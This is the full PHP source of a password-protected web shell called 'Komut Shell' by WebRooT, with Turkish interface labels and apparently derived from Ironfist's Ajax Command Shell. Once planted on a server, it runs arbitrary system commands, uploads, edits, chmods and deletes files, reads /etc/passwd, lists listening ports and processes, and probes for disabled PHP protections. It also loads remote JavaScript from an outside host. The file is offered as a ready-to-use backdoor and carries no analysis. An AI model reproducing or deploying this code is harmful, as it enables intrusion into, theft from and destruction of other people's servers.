1 <?php ?><?

php
2 session_start();
3 error_reporting(0);
4 $password = "webr00t"; //Change this to your password ;)
5 $version = "0.7B";
6 $functions = array('Ekrani Temizle' => 'ClearScreen()', 'Gecmisi Temizle' =>
'ClearHistory()', 'Fonksiyon Bilgisi' => "runcommand('canirun','GET')", 'Server
Bilgisi' => "runcommand('showinfo','GET')", '/etc/passwd Oku' =>
"runcommand('etcpasswdfile','GET')", 'Acik Portlar' => "runcommand('netstat -an |
grep -i listen','GET')", 'Calisan Uygulamalar' => "runcommand('ps -aux','GET')",);
7 $thisfile = basename(__FILE__);
8 $style = '<style type="text/css">
9 .cmdthing {
10 border-top-width: 0px;
11 font-weight: bold;
12 border-left-width: 0px;
13 font-size: 10px;
14 border-left-color: #000000;
15 background: #000000;
16 border-bottom-width: 0px;
17 border-bottom-color: #FFFFFF;
18 color: #FFFFFF;
19 border-top-color: #008000;
20 font-family: verdana;
21 border-right-width: 0px;
22 border-right-color: #000000;
23 }
24 input,textarea {
25 border-top-width: 1px;
26 font-weight: bold;
27 border-left-width: 1px;
28 font-size: 10px;
29 border-left-color: #FFFFFF;
30 background: #000000;
31 border-bottom-width: 1px;
32 border-bottom-color: #FFFFFF;
33 color: #FFFFFF;
34 border-top-color: #FFFFFF;
35 font-family: verdana;
36 border-right-width: 1px;
37 border-right-color: #FFFFFF;
38 }
39 A:hover {
40 text-decoration: none;
41 }
42
 43
44 table,td,div {
45 border-collapse: collapse;
46 border: 1px solid #FFFFFF;
47 }
48 body {
49 color: #FFFFFF;
50 font-family: verdana;
51 }
52 </style>';
53 $sess = __FILE__ . $password;
54 if (isset($_POST['p4ssw0rD'])) {
55 if ($_POST['p4ssw0rD'] == $password) {
56 $_SESSION[$sess] = $_POST['p4ssw0rD'];
57 } else {
58 die("Wrong password");
59 }
60 }
61 if ($_SESSION[$sess] == $password) {
62 if (isset($_SESSION['workdir'])) {
63 if (file_exists($_SESSION['workdir']) && is_dir($_SESSION['workdir'])) {
64 chdir($_SESSION['workdir']);
65 }
66 }
67 if (isset($_FILES['uploadedfile']['name'])) {
68 $target_path = "./";
69 $target_path = $target_path . basename($_FILES['uploadedfile']['name']);
70 if (move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path))
{
71 }
72 }
73 if (isset($_GET['runcmd'])) {
74 $cmd = $_GET['runcmd'];
75 print "<b>" . get_current_user() . "~# </b>" . htmlspecialchars($cmd) .
"<br>";
76 if ($cmd == "") {
77 print "Empty Command..type \"shellhelp\" for some ehh...help";
78 } elseif ($cmd == "upload") {
79 print '<br>Uploading to: ' . realpath(".");
80 if (is_writable(realpath("."))) {
81 print "<br><b>I can write to this directory</b>";
82 } else {
83 print "<br><b><font color=red>I can't write to this directory, please
choose another one.</b></font>";
84 }
85 } elseif ((ereg("changeworkdir (.*)", $cmd, $file)) || (ereg("cd (.*)", $cmd,
$file))) {
86 if (file_exists($file[1]) && is_dir($file[1])) {
87 chdir($file[1]);
88 $_SESSION['workdir'] = $file[1];
89 print "Current directory changed to " . $file[1];
90 } else {
91 print "Directory not found";
92 }
93 } elseif (ereg("editfile (.*)", $cmd, $file)) {
94 if (file_exists($file[1]) && !is_dir($file[1])) {
95 print "<form name=\"saveform\"><textarea cols=70 rows=10
id=\"area1\">";
96 $contents = file($file[1]);
97 foreach ($contents as $line) {
98 print htmlspecialchars($line);
99 }
100 print "</textarea><br><input size=80 type=text name=filetosave
value=" . $file[1] . "><input value=\"Save\" type=button
onclick=\"SaveFile();\"></form>";
101 } else {
102 print "File not found.";
103 }
104 } elseif (ereg("deletefile (.*)", $cmd, $file)) {
105 if (is_dir($file[1])) {
106 if (rmdir($file[1])) {
107 print "Directory succesfully deleted.";
108 } else {
109 print "Couldn't delete directory!";
110 }
111 } else {
112 if (unlink($file[1])) {
113 print "File succesfully deleted.";
114 } else {
115 print "Couldn't delete file!";
116 }
117 }
118 } elseif (strtolower($cmd) == "canirun") {
119 print "<br>";
120 if (function_exists(passthru)) {
121 print "Passthru: <b><font color=green>Enabled</b></font><br>";
122 } else {
123 print "Passthru: <b><font color=red>Disabled</b></font><br>";
124 }
125 if (function_exists(exec)) {
126 print "Exec: <b><font color=green>Enabled</b></font><br>";
127 } else {
128 print "Exec: <b><font color=red>Disabled</b></font><br>";
129 }
130 if (function_exists(system)) {
131 print "System: <b><font color=green>Enabled</b></font><br>";
132 } else {
133 print "System: <b><font color=red>Disabled</b></font><br>";
134 }
135 if (function_exists(shell_exec)) {
136 print "Shell_exec: <b><font color=green>Enabled</b></font><br>";
137 } else {
138 print "Shell_exec: <b><font color=red>Disabled</b></font><br>";
139 }
140 print "<br><br>";
141 if (ini_get('safe_mode')) {
142 print "Safe Mode: <b><font color=red>Enabled</b></font>";
143 } else {
144 print "Safe Mode: <b><font color=green>Disabled</b></font>";
145 }
146 print "<br><br><br>";
147 if (ini_get('open_basedir')) {
148 print "Open_basedir: <b><font color=red>Enabled</b></font>";
149 } else {
150 print "Open_basedir: <b><font color=green>Disabled</b></font>";
151 }
152 }
153 //About the shell
154 elseif (ereg("listdir (.*)", $cmd, $directory)) {
155 if (!file_exists($directory[1])) {
156 die("Directory not found");
157 }
158 //Some variables
159 chdir($directory[1]);
160 $i = 0;
161 $f = 0;
162 $dirs = "";
163 $filez = "";
164 if (!ereg("/$", $directory[1])) //Does it end with a slash?
165 {
166 $directory[1].= "/"; //If not, add one
167
168 }
169 print "Listing directory: " . $directory[1] . "<br>";
170 print "<table
border=0><td><b>Directories</b></td><td><b>Files</b></td><tr>";
171 if ($handle = opendir($directory[1])) {
172 while (false !== ($file = readdir($handle))) {
173 if (is_dir($file)) {
174 $dirs[$i] = $file;
175 $i++;
176 } else {
177 $filez[$f] = $file;
178 $f++;
179 }
180 }
181 print "<td>";
182 foreach ($dirs as $directory) {
183 print "<i style=\"cursor:crosshair\" onclick=\"deletefile('" .
realpath($directory) . "');\">[D]</i><i style=\"cursor:crosshair\"
onclick=\"runcommand('changeworkdir " . realpath($directory) .
"','GET');\">[W]</i><b style=\"cursor:crosshair\"
onclick=\"runcommand('clear','GET'); runcommand ('listdir " . realpath($directory) .
"','GET'); \">" . $directory . "</b><br>";
184 }
185 print "</td><td>";
186 foreach ($filez as $file) {
187 print "<i style=\"cursor:crosshair\" onclick=\"deletefile('" .
realpath($file) . "');\">[D]</i><u style=\"cursor:crosshair\"
onclick=\"runcommand('editfile " . realpath($file) . "','GET');\">" . $file . "</u><br>";
188 }
189 print "</td></table>";
190 }
191 } elseif (strtolower($cmd) == "about") {
192 print "Ajax Command Shell by <a
href=http://www.ironwarez.info>Ironfist</a>.<br>Version $version";
193 }
194 //Show info
195 elseif (strtolower($cmd) == "showinfo") {
196 if (function_exists(disk_free_space)) {
197 $free = disk_free_space("/") / 1000000;
198 } else {
199 $free = "N/A";
200 }
201 if (function_exists(disk_total_space)) {
202 $total = trim(disk_total_space("/") / 1000000);
203 } else {
204 $total = "N/A";
205 }
206 $path = realpath(".");
207 print "<b>Free:</b> $free / $total MB<br><b>Current path:</b>
$path<br><b>Uname -a Output:</b><br>";
208 if (function_exists(passthru)) {
209 passthru("uname -a");
210 } else {
211 print "Passthru is disabled :(";
212 }
213 }
214 //Read /etc/passwd
215 elseif (strtolower($cmd) == "etcpasswdfile") {
216 $pw = file('/etc/passwd/');
217 foreach ($pw as $line) {
218 print $line;
219 }
220 }
221 //Execute any other command
222 else {
223 if (function_exists(passthru)) {
224 passthru($cmd);
225 } else {
226 if (function_exists(exec)) {
227 exec("ls -la", $result);
228 foreach ($result as $output) {
229 print $output . "<br>";
230 }
231 } else {
232 if (function_exists(system)) {
233 system($cmd);
234 } else {
235 if (function_exists(shell_exec)) {
236 print shell_exec($cmd);
237 } else {
238 print "Sorry, none of the command functions works.";
239 }
240 }
241 }
242 }
243 }
244 } elseif (isset($_GET['savefile']) && !empty($_POST['filetosave']) && !
empty($_POST['filecontent'])) {
245 $file = $_POST['filetosave'];
246 if (!is_writable($file)) {
247 if (!chmod($file, 0777)) {
248 die("Nope, can't chmod nor save :("); //In fact, nobody ever reads this
message ^_^
249
250 }
251 }
252 $fh = fopen($file, 'w');
253 $dt = $_POST['filecontent'];
254 fwrite($fh, $dt);
255 fclose($fh);
256 } else {
257 ?>
258 <html>
259 <title>Komut Shell ~ <?php print getenv("HTTP_HOST"); ?> ~ by
WebRooT</title>
260 <meta http-equiv="Content-Type" content="text/html; charset=windows-1254" />
261 <head>
262 <?php print $style; ?>
263 <SCRIPT TYPE="text/javascript">
264 function sf(){document.cmdform.command.focus();}
265 var outputcmd = "";
266 var cmdhistory = "";
267 function ClearScreen()
268 {
269 outputcmd = "";
270 document.getElementById('output').innerHTML = outputcmd;
271 }
272
273 function ClearHistory()
274 {
275 cmdhistory = "";
276 document.getElementById('history').innerHTML = cmdhistory;
277 }
278
279 function deletefile(file)
280 {
281 deleteit = window.confirm("Are you sure you want to delete
282 "+file+"?");
283 if(deleteit)
284 {
285 runcommand('deletefile ' + file,'GET');
286 }
287 }
288
289 var http_request = false;
290 function makePOSTRequest(url, parameters) {
291 http_request = false;
292 if (window.XMLHttpRequest) {
293 http_request = new XMLHttpRequest();
294 if (http_request.overrideMimeType) {
295 http_request.overrideMimeType('text/html');
296 }
297 } else if (window.ActiveXObject) {
298 try {
299 http_request = new ActiveXObject("Msxml2.XMLHTTP");
300 } catch (e) {
301 try {
302 http_request = new ActiveXObject("Microsoft.XMLHTTP");
303 } catch (e) {}
304 }
305 }
306 if (!http_request) {
307 alert('Cannot create XMLHTTP instance');
308 return false;
309 }
310
311
312 http_request.open('POST', url, true);
313 http_request.setRequestHeader("Content-type", "application/x-www-form-
urlencoded");
314 http_request.setRequestHeader("Content-length", parameters.length);
315 http_request.setRequestHeader("Connection", "close");
316 http_request.send(parameters);
317 }
318
319
320 function SaveFile()
321 {
322 var poststr = "filetosave=" + encodeURI( document.saveform.filetosave.value ) +
323 "&filecontent=" +
encodeURI( document.getElementById("area1").value );
324 makePOSTRequest('<?php print $ThisFile; ?>?savefile', poststr);
325 document.getElementById('output').innerHTML =
document.getElementById('output').innerHTML + "<br><b>Saved! If it didn't save,
you'll need to chmod the file to 777 yourself,<br> however the script tried to chmod it
automaticly.";
326 }
327
328 function runcommand(urltoopen,action,contenttosend){
329 cmdhistory = "<br>&nbsp;<i style=\"cursor:crosshair\"
onclick=\"document.cmdform.command.value='" + urltoopen + "'\">" + urltoopen +
"</i> " + cmdhistory;
330 document.getElementById('history').innerHTML = cmdhistory;
331 if(urltoopen == "clear")
332 {
333 ClearScreen();
334 }
335 var ajaxRequest;
336 try{
337 ajaxRequest = new XMLHttpRequest();
338 } catch (e){
339 try{
340 ajaxRequest = new ActiveXObject("Msxml2.XMLHTTP");
341 } catch (e) {
342 try{
343 ajaxRequest = new ActiveXObject("Microsoft.XMLHTTP");
344 } catch (e){
345 alert("Wicked error, nothing we can do about it...");
346 return false;
347 }
348 }
349 }
350 ajaxRequest.onreadystatechange = function(){
351 if(ajaxRequest.readyState == 4){
352 outputcmd = "<pre>" + outputcmd + ajaxRequest.responseText +"</pre>";
353 document.getElementById('output').innerHTML = outputcmd;
354 var objDiv = document.getElementById("output");
355 objDiv.scrollTop = objDiv.scrollHeight;
356 }
357 }
358 ajaxRequest.open(action, "?runcmd="+urltoopen , true);
359 if(action == "GET")
360 {
361 ajaxRequest.send(null);
362 }
363 document.cmdform.command.value='';
364 return false;
365 }
366
367 function set_tab_html(newhtml)
368 {
369 document.getElementById('commandtab').innerHTML = newhtml;
370 }
371
372 function set_tab(newtab)
373 {
374 if(newtab == "cmd")
375 {
376 newhtml = '&nbsp;&nbsp;&nbsp;<form name="cmdform" onsubmit="return
runcommand(document.cmdform.command.value,\'GET\');"><b>Command</b>:
<input type=text name=command class=cmdthing size=100%><br></form>';
377 }
378 else if(newtab == "upload")
379 {
380 runcommand('upload','GET');
381 newhtml = '<font size=0><b>Sayfa Yenilenecek...</b><br><br><form
enctype="multipart/form-data" action="<?php print $ThisFile; ?>"
method="POST"><input type="hidden" name="MAX_FILE_SIZE"
value="10000000" />Dosya se: <input name="uploadedfile" type="file" /><br
/><input type="submit" value="Upload File" /></form></font>';
382 }
383 else if(newtab == "workingdir")
384 {
385 <?php
386 $folders = "<form name=workdir onsubmit=\"return
runcommand(\'changeworkdir \' +
document.workdir.changeworkdir.value,\'GET\');\"><input size=80% type=text
name=changeworkdir value=\"";
387 $pathparts = explode("/", realpath("."));
388 foreach ($pathparts as $folder) {
389 $folders.= $folder . "/";
390 }
391 $folders.= "\"><input type=submit value=Change></form><br>Script
directory: <i style=\"cursor:crosshair\"
onclick=\"document.workdir.changeworkdir.value=\'" . dirname(__FILE__) . "\'>" .
dirname(__FILE__) . "</i>";
392 ?>
393 newhtml = '<?php print $folders; ?>';
394 }
395 else if(newtab == "filebrowser")
396 {
397 newhtml = '<b>File browser is under construction! Use at your own risk!
</b> <br>You can use it to change your working directory easily, don\'t expect too
much of it.<br>Click on a file to edit it.<br><i>[W]</i> = set directory as working
directory.<br><i>[D]</i> = delete file/directory';
398 runcommand('listdir .','GET');
399 }
400 else if(newtab == "createfile")
401 {
402 newhtml = '<b>File Editor, under construction.</b>';
403 document.getElementById('output').innerHTML = "<form
name=\"saveform\"><textarea cols=70 rows=10 id=\"area1\"></textarea><br><input
size=80 type=text name=filetosave value=\"<?php print realpath('.') . "/" . rand(1000,
999999) . ".txt"; ?>\"><input value=\"Save\" type=button
onclick=\"SaveFile();\"></form>";
404
405 }
406 document.getElementById('commandtab').innerHTML = newhtml;
407 }
408 </script>
409 </head>
410 <body bgcolor=black onload="sf();" vlink=white alink=white link=white>
411 <table border=1 width=100% height=100%>
412 <td width=15% valign=top>
413 <SCRIPT SRC=http://www.r57.gen.tr/yazciz/ciz.js></SCRIPT>
414 <form name="extras"><br>
415 <center><b>Hizli Komutlar</b><br>
416
417 <div style='margin: 0px;padding: 0px;border: 1px inset;overflow: auto'>
418 <?php
419 foreach ($functions as $name => $execute) {
420 print '&nbsp;<input type="button" value="' . $name . '" onclick="' .
$execute . '"><br>';
421 }
422 ?>
423
424 </center>
425
426 </div>
427 </form>
428 <center><b>Komut Gecmisi</b><br></center>
429 <div id="history" style='margin: 0px;padding: 0px;border: 1px inset;width:
100%;height: 20%;text-align: left;overflow: auto;font-size: 10px;'></div>
430 <br>
431 <center><b>Hakkinda</b><br></center>
432 <div style='margin: 0px;padding: 0px;border: 1px inset;width: 100%;text-align:
center;overflow: auto; font-size: 10px;'>
433 <br>
434 <b><font size=3>Komut Shell</b></font><br>by WebRooT
435 <br>
436 Version <?php print $version; ?>
437 </div>
438 <SCRIPT SRC=http://www.r57.gen.tr/yazciz/ciz.js></SCRIPT>
439 </td>
440 <td width=70%>
441 <table border=0 width=100% height=100%><td id="tabs" height=1%><font
size=0>
442 <b style="cursor:crosshair" onclick="set_tab('cmd');">[Komut alistir]</b>
443 <b style="cursor:crosshair" onclick="set_tab('upload');">[Dosya Upload]</b>
444 <b style="cursor:crosshair" onclick="set_tab('workingdir');">[Dizin Degistir]</b>
445 <b style="cursor:crosshair" onclick="set_tab('filebrowser');">[Dosya
Yoneticisi]</b>
446 <b style="cursor:crosshair" onclick="set_tab('createfile');">[Dosya Olustur]</b>
447
448 </font></td>
449 <tr>
450 <td height=99% width=100% valign=top><div id="output"
style='height:100%;white-space:pre;overflow:auto'></div>
451
452 <tr>
453 <td height=1% width=100% valign=top>
454 <div id="commandtab" style='height:100%;white-space:pre;overflow:auto'>
455 &nbsp;&nbsp;&nbsp;<form name="cmdform" onsubmit="return
runcommand(document.cmdform.command.value,'GET');">
456 <b>Komut Satiri</b>: <input type=text name=command class=cmdthing
size=100%><br>
457 </form>
458 </div>
459 </td>
460 </table>
461 </td>
462 </table>
463 </body>
464 </html>
465 <?php
466 }
467 } else {
468 print "<center><table border=0 height=100%>
469 <td valign=middle>
470 <form action=" . basename(__FILE__) . " method=POST>Ltfen giris yapiniz.
(sifre=webr00t)<br><b>Password:</b><input type=password
name=p4ssw0rD><input type=submit value=\"Log in\">
471 </form>";
472 }
473 ?>